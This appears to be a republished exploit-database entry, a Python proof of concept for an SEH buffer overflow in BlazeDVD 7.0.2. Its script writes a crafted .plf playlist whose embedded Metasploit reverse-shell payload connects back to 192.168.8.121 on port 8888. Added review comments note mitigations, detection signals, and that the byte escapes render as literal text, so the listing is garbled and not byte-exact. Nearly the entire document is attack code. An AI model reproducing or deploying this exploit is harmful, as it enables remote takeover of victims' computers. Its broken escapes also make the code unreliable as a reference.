
Published on April 15th, 2020 📆 | 4827 Views ⚑


BlazeDVD 7.0.2 Buffer Overflow ↭



# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python

# Output path: a .plf playlist file, the input type this proof of concept
# feeds to BlazeDVD.
file = "exploit.plf"

# Filler in front of the overwritten SEH record. Presumably 612 is the
# distance to the handler field and 4 is the size of the next-SEH field that
# sits directly before it -- the page gives no derivation, so treat the
# numbers as specific to the tested build (7.0.2 on Windows 7 Pro x86).
offset = (612 - 4) * "A"

# Values for the next-SEH and SEH-handler fields. As rendered on this page
# they are plain ASCII text (each "xNN" group is four literal characters), so
# they are kept exactly as listed.
# NOTE(review): the handler value is a fixed address, so the technique relies
# on a module loaded at a predictable base without SafeSEH; SEHOP, SafeSEH and
# ASLR are the mitigations to verify on an affected host.
nseh = "xebx1ex90x90"
seh = "x34x31x02x64"

# Padding placed between the SEH record and the payload.
nops = 24 * "x90"

# Payload blob, built up by string concatenation. Per the generator comment
# below it is a Metasploit windows/shell_reverse_tcp payload, encoded with
# x86/alpha_mixed, pointing at a hard-coded private address (192.168.8.121,
# port 8888) and generated to avoid the bytes 00, 0a, 0d and ff.
# NOTE(review): the "=3D" and the trailing "=" after the port look like
# quoted-printable residue from the page's source; the comment is kept as
# published.
# NOTE(review): as rendered here every "xNN" group is literal text rather than
# a byte escape, so this listing is not a byte-exact copy of the original
# payload and should not be used as a hash or signature reference.
# NOTE(review): alpha_mixed output is largely printable ASCII, so a very long
# printable run inside a single playlist entry is an anomaly worth alerting
# on, alongside the player process spawning a shell or opening an outbound
# connection -- confirm thresholds against known-good .plf files.
# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b 'x00x0ax0dxff'
shellcode = ""
shellcode += "x89xe2xdaxccxd9x72xf4x5ax4ax4ax4ax4ax4a"
shellcode += "x4ax4ax4ax4ax4ax4ax43x43x43x43x43x43x37"
shellcode += "x52x59x6ax41x58x50x30x41x30x41x6bx41x41"
shellcode += "x51x32x41x42x32x42x42x30x42x42x41x42x58"
shellcode += "x50x38x41x42x75x4ax49x59x6cx69x78x4ex62"
shellcode += "x53x30x63x30x45x50x45x30x6fx79x7ax45x46"
shellcode += "x51x79x50x73x54x4cx4bx76x30x66x50x6ex6b"
shellcode += "x66x32x74x4cx6cx4bx51x42x72x34x4cx4bx34"
shellcode += "x32x31x38x76x6fx6cx77x61x5ax47x56x66x51"
shellcode += "x6bx4fx6ex4cx75x6cx65x31x33x4cx64x42x64"
shellcode += "x6cx31x30x5ax61x38x4fx64x4dx66x61x7ax67"
shellcode += "x49x72x6ax52x71x42x30x57x6cx4bx53x62x36"
shellcode += "x70x6ex6bx30x4ax45x6cx6cx4bx32x6cx37x61"
shellcode += "x43x48x6ax43x31x58x55x51x6bx61x32x71x4c"
shellcode += "x4bx33x69x47x50x75x51x6ax73x4cx4bx47x39"
shellcode += "x72x38x4dx33x56x5ax30x49x4ex6bx57x44x6c"
shellcode += "x4bx43x31x7ax76x55x61x79x6fx4ex4cx6ax61"
shellcode += "x78x4fx54x4dx33x31x58x47x54x78x59x70x44"
shellcode += "x35x6bx46x75x53x63x4dx48x78x75x6bx51x6d"
shellcode += "x46x44x74x35x6bx54x72x78x4cx4bx70x58x45"
shellcode += "x74x43x31x79x43x50x66x4cx4bx74x4cx32x6b"
shellcode += "x6ex6bx52x78x47x6cx46x61x69x43x6cx4bx47"
shellcode += "x74x6cx4bx37x71x4ax70x6dx59x30x44x46x44"
shellcode += "x44x64x33x6bx71x4bx65x31x43x69x71x4ax52"
shellcode += "x71x79x6fx69x70x51x4fx51x4fx51x4ax4cx4b"
shellcode += "x57x62x58x6bx4ex6dx63x6dx35x38x55x63x64"
shellcode += "x72x43x30x65x50x75x38x64x37x43x43x44x72"
shellcode += "x43x6fx42x74x52x48x50x4cx71x67x67x56x44"
shellcode += "x47x59x6fx69x45x68x38x7ax30x37x71x63x30"
shellcode += "x63x30x46x49x6fx34x71x44x42x70x32x48x56"
shellcode += "x49x6dx50x42x4bx57x70x69x6fx49x45x56x30"
shellcode += "x50x50x36x30x30x50x33x70x66x30x67x30x76"
shellcode += "x30x32x48x4ax4ax54x4fx39x4fx4dx30x39x6f"
shellcode += "x49x45x6ex77x42x4ax63x35x30x68x69x50x6e"
shellcode += "x48x46x68x61x69x62x48x34x42x63x30x65x72"
shellcode += "x6fx48x4fx79x4ax46x62x4ax46x70x52x76x52"
shellcode += "x77x65x38x4dx49x4dx75x71x64x70x61x4bx4f"
shellcode += "x58x55x4cx45x4fx30x34x34x54x4cx6bx4fx70"
shellcode += "x4ex34x48x63x45x5ax4cx42x48x6ax50x68x35"
shellcode += "x4cx62x32x76x39x6fx5ax75x63x58x61x73x32"
shellcode += "x4dx63x54x57x70x4fx79x38x63x52x77x73x67"
shellcode += "x62x77x30x31x7ax56x63x5ax67x62x71x49x33"
shellcode += "x66x79x72x59x6dx35x36x58x47x30x44x67x54"
shellcode += "x37x4cx75x51x46x61x6cx4dx37x34x64x64x66"
shellcode += "x70x7ax66x75x50x52x64x32x74x76x30x56x36"
shellcode += "x63x66x46x36x73x76x71x46x70x4ex30x56x76"
shellcode += "x36x51x43x51x46x50x68x71x69x48x4cx57x4f"
shellcode += "x6ex66x69x6fx6ax75x4bx39x79x70x42x6ex33"
shellcode += "x66x47x36x79x6fx36x50x53x58x76x68x4cx47"
shellcode += "x57x6dx31x70x59x6fx6ax75x4fx4bx6cx30x58"
shellcode += "x35x79x32x72x76x53x58x4fx56x6dx45x6fx4d"
shellcode += "x6dx4dx79x6fx4ax75x55x6cx34x46x31x6cx56"
shellcode += "x6ax4bx30x59x6bx6dx30x31x65x66x65x6dx6b"
shellcode += "x33x77x35x43x53x42x72x4fx50x6ax37x70x61"
shellcode += "x43x49x6fx68x55x41x41"





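# Assemble the file contents in a fixed order: filler, next-SEH field,
# SEH-handler field, padding, then the payload.
buffer = offset + nseh + seh + nops + shellcode

# Write the assembled string to the path held in `file` (relative, so it lands
# in the current working directory). The context manager closes the handle
# even if the write raises, which the bare open/write/close sequence did not
# guarantee.
# NOTE(review): the output is a single unbroken line of well over 608
# characters; a playlist entry of that length is a reasonable triage signal
# when screening .plf files from untrusted sources.
with open(file, 'w') as f:
    f.write(buffer)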
